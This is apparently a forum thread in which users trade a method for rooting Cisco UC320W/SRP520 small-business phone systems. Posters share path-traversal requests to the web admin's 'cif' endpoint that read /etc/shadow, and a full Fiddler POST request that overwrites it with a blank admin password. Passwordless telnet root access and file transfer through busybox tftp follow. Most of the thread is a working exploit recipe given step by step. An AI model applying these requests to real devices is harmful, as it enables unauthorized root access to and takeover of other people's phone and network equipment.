I can't work out your admin access - I'm missing something, but have you played around with the privilege levels in the config.xml to see if it enables the hidden web pages?

At first I was trying to change this file, there was no result.

May be it will interesting for you:

http://192.168.10.1/admin/config.xml

http://192.168.10.1/admin/status.xml

same files in other paths:

http://192.168.10.1/wizard/status.xml

http://192.168.10.1/usbwizard/status.xml

demon httpd in attachment

Files of ~/www/wizard/

~/www/wizard/AC_OETags.js
~/www/wizard/askfordevmode.html
~/www/wizard/cisco_logo_header.png
~/www/wizard/data
~/www/wizard/framework_3.5.0.12683.swf
~/www/wizard/framework_3.5.0.12683.swz
~/www/wizard/images
~/www/wizard/javascript
~/www/wizard/pageBackground.jpg
~/www/wizard/PhoneBoothHelp.html
~/www/wizard/playerProductInstall.swf
~/www/wizard/sckq4.swf
~/www/wizard/setupwizard.html
~/www/wizard/UC320W_Introduction.swf
~/www/wizard/UC320W_Introduction_de.swf
~/www/wizard/UC320W_Introduction_es.swf
~/www/wizard/UC320W_Introduction_fr.swf
~/www/wizard/UC320W_Introduction_it.swf
~/www/wizard/UC320W_Introduction_pt.swf
~/www/wizard/upgradeApp.js
~/www/wizard/version.txt
~/www/wizard/data/localization
~/www/wizard/data/localization/de_DE.xml
~/www/wizard/data/localization/en_US.xml
~/www/wizard/data/localization/es_ES.xml
~/www/wizard/data/localization/fr_FR.xml
~/www/wizard/data/localization/it_IT.xml
~/www/wizard/data/localization/last_drop
~/www/wizard/data/localization/pt_BR.xml
~/www/wizard/data/localization/pt_PT.xml
~/www/wizard/data/localization/last_drop/.svn
~/www/wizard/data/localization/last_drop/notes
~/www/wizard/data/localization/last_drop/.svn/all-wcprops
~/www/wizard/data/localization/last_drop/.svn/entries
~/www/wizard/data/localization/last_drop/.svn/prop-base
~/www/wizard/data/localization/last_drop/.svn/props
~/www/wizard/data/localization/last_drop/.svn/text-base
~/www/wizard/data/localization/last_drop/.svn/tmp
~/www/wizard/data/localization/last_drop/.svn/text-base/notes.svn-base
~/www/wizard/data/localization/last_drop/.svn/tmp/prop-base
~/www/wizard/data/localization/last_drop/.svn/tmp/props
~/www/wizard/data/localization/last_drop/.svn/tmp/text-base
~/www/wizard/images/systemmap
~/www/wizard/images/systemmap/network
~/www/wizard/images/systemmap/site
~/www/wizard/images/systemmap/telephony
~/www/wizard/images/systemmap/network/Network_LAN2.png
~/www/wizard/images/systemmap/network/Network_PortForwarding2.png
~/www/wizard/images/systemmap/network/Network_Topology2.png
~/www/wizard/images/systemmap/network/Network_WAN2.png
~/www/wizard/images/systemmap/network/Network_Wireless2.png
~/www/wizard/images/systemmap/site/Site_Backup2.png
~/www/wizard/images/systemmap/site/Site_Region2.png
~/www/wizard/images/systemmap/site/Site_SystemAccess2.png
~/www/wizard/images/systemmap/telephony/CallRouting_AutoAttendant2.png
~/www/wizard/images/systemmap/telephony/CallRouting_CallPaging2.png
~/www/wizard/images/systemmap/telephony/CallRouting_HuntGroups2.png
~/www/wizard/images/systemmap/telephony/CallRouting_InboundCalls2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_AdditionalExtensions2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_SharedExtensions2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_SharedFXOLines2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_FXSPorts2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_LineFXOPorts2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_OutboundTrunks2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_SIPBRITrunks2.png
~/www/wizard/images/systemmap/telephony/Telephony_DayNightFeatures2.png
~/www/wizard/images/systemmap/telephony/Telephony_Devices2.png
~/www/wizard/images/systemmap/telephony/Telephony_InternalDialing2.png
~/www/wizard/images/systemmap/telephony/Telephony_Music2.png
~/www/wizard/images/systemmap/telephony/Telephony_PBXKeySystem2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_CallForwarding2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_Directory2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_PhoneButtonLabels2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_PhoneButtons2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_VoicemailtoEmail2.png
~/www/wizard/images/systemmap/telephony/UsersPhones_AssignPhones2.png
~/www/wizard/images/systemmap/telephony/UsersPhones_Users2.png
~/www/wizard/javascript/ajaxfileupload.js
~/www/wizard/javascript/bgstretcher.css
~/www/wizard/javascript/bgstretcher.js
~/www/wizard/javascript/images
~/www/wizard/javascript/jquery-ui.custom.css
~/www/wizard/javascript/jquery-ui.js
~/www/wizard/javascript/jquery.js
~/www/wizard/javascript/upgrade_firmware
~/www/wizard/javascript/images/ui-bg_flat_0_aaaaaa_40x100.png
~/www/wizard/javascript/images/ui-bg_flat_75_ffffff_40x100.png
~/www/wizard/javascript/images/ui-bg_glass_55_fbf9ee_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_65_ffffff_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_75_dadada_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_75_e6e6e6_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_95_fef1ec_1x400.png
~/www/wizard/javascript/images/ui-bg_highlight-soft_75_cccccc_1x100.png
~/www/wizard/javascript/images/ui-icons_222222_256x240.png
~/www/wizard/javascript/images/ui-icons_2e83ff_256x240.png
~/www/wizard/javascript/images/ui-icons_454545_256x240.png
~/www/wizard/javascript/images/ui-icons_888888_256x240.png
~/www/wizard/javascript/images/ui-icons_cd0a0a_256x240.png
~/www/wizard/javascript/upgrade_firmware/locale_de_de.js
~/www/wizard/javascript/upgrade_firmware/locale_en_us.js
~/www/wizard/javascript/upgrade_firmware/locale_es_es.js
~/www/wizard/javascript/upgrade_firmware/locale_fr_fr.js
~/www/wizard/javascript/upgrade_firmware/locale_it_it.js
~/www/wizard/javascript/upgrade_firmware/locale_pt_br.js
~/www/wizard/javascript/upgrade_firmware/locale_pt_pt.js
~/www/wizard/javascript/upgrade_firmware/main.js
~/www/wizard/javascript/upgrade_firmware/styles.css

All files accessible via http, for example:

http://192.168.10.1/wizard/javascript/upgrade_firmware/styles.css

how did you use fiddler? Using the composer I sent

POST http://192.168.10.1/admin/cif?file=/../../etc/shadow&xuser=admin&xpassword=123456789 HTTP/1.1
Accept: */*
Referer: http://192.168.10.1/admin/cif?file=/../../etc/shadow
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Host: 192.168.10.1
DNT: 1
Connection: Keep-Alive
Pragma: no-cache
Cookie: dev_disable_warning=true; dev_mode=Integration

admin::0:0:99999:7:::

but keep coming back its blanked out the shadow file

First you must logon in web gui by any browser. After take Fiddler and go to:

"Composer" tab -> "Parsed" tab:

POST — http://192.168.10.1/admin/cif?file=/../../etc/shadow

or if you not login before — LOGIN - your login and PASSWORD - your password

http://192.168.10.1/admin/cif?file=../../etc/shadow&xuser=LOGIN&xpassword=PASSWORD

Request body:

admin::0:0:99999:7:::

Execute

OK got it was putting admin::0:0:99999:7::: in the wrong area

Fiddler required RTFM? :)

You can use PASSWD by telnet for seting new password.

P.S. After rebooting your device password will be set to factory default.

P.P.S. By default web admin accessible only from LAN network and blocked from WAN&WiFi.

This files located in ~/www/, but is not accessible from httpd server.

*It's web admin of SRP520 series.

I decided to share achievements, still on the Cisco S & B shit a long time, I think they should pay special attention. Sources with them, asking several times, but they stupidly silent.

I am too lazy too lazy to translate into English, otherwise I would not tweeted yet. Whom it is necessary to understand.

What is available via httpd:

http://192.168.10.1/askfordevmode.html

http://192.168.10.1/wizard/askfordevmode.html

Only after login:

http://192.168.10.1/admin/voice/

http://192.168.10.1/admin/cif

Now the fun part. Cif process launched with root privileges, and can work with the file system. This makes it possible to obtain a directory listing, read files, and even writing.

Queries are as follows:

http://192.168.10.1/admin/cif?dir= - will give the entire contents of the directory ~/home/usb_disk

http://192.168.10.1/admin/cif?file=pb_db.txt - as well as text , we get all the contents of the file ~/home/usb_disk/pb_db.txt

Attention to the question, and one we get the contents of the file meshat shadow? Yes, no one!

http://192.168.10.1/admin/cif?file=/../../etc/shadow

List of salt and we already have. Password for uchetku admin generated and written every time you start the device, which is a bit inconvenient. Salt always alone, then the password is always the same. He created based on the MAC address of the device, but the principle is unknown to me. Instead, reset it to us no one interferes, although this should be done every time you restart.

Create a query with the contents:

admin::0:0:99999:7:::

And by POST method through HTTP send it on the link above. Then take telnet and connect to it by entering the user name admin, password, he will not ask.

Then using busybox, or rather its wrapper tar and tftp can quickly receive and upload files to the device.

The entire configuration is stored in XML. I describe where something:

~/home/usb_disk/cfg/misc/dynamicconfig.xml — options flash wizard

~/home/usb_disk/cfg/locales/ — region packs in XML and dictionaries for IP phones

~/home/usb_disk/tftproot/ — folder from which IP phones receive information about the firmware. These files are loaded first IP phones, after receiving information on the DHCP address of the TFTP server

~/home/usb_disk/cfg/firmware/ - directory with phone firmware

This is the most important, and the rest describe the sense not see, will understand already own.

If someone will pick httpd, it can be noted that it mounts on startup container ~/home/usb_disk/wz.fs with read-only access to the directory ~/www/wizard/

I ask if any other operating time not to forget to share them with others.

P.S. If anyone will be able to, collect SSH for him for more convenient access for SFTP, all auxiliary components are already there. I still do not own up to it.

You can request the source code directly from cisco - if you are interested.

That'll only be the FOSS stuff, unlikely to be that interesting. Just the usual kernel and busybox stuff. It is trivial to get shell access though, loads of injection potential in the web interface (including R/W access to the filesystem through a nice API!)

yes I had a look through it a couple of years ago and there wasn't anything that would help unlock the device

Thanks, but it doesn't work on mine. 404 error

doesn't work for me.  anyway, thank you very much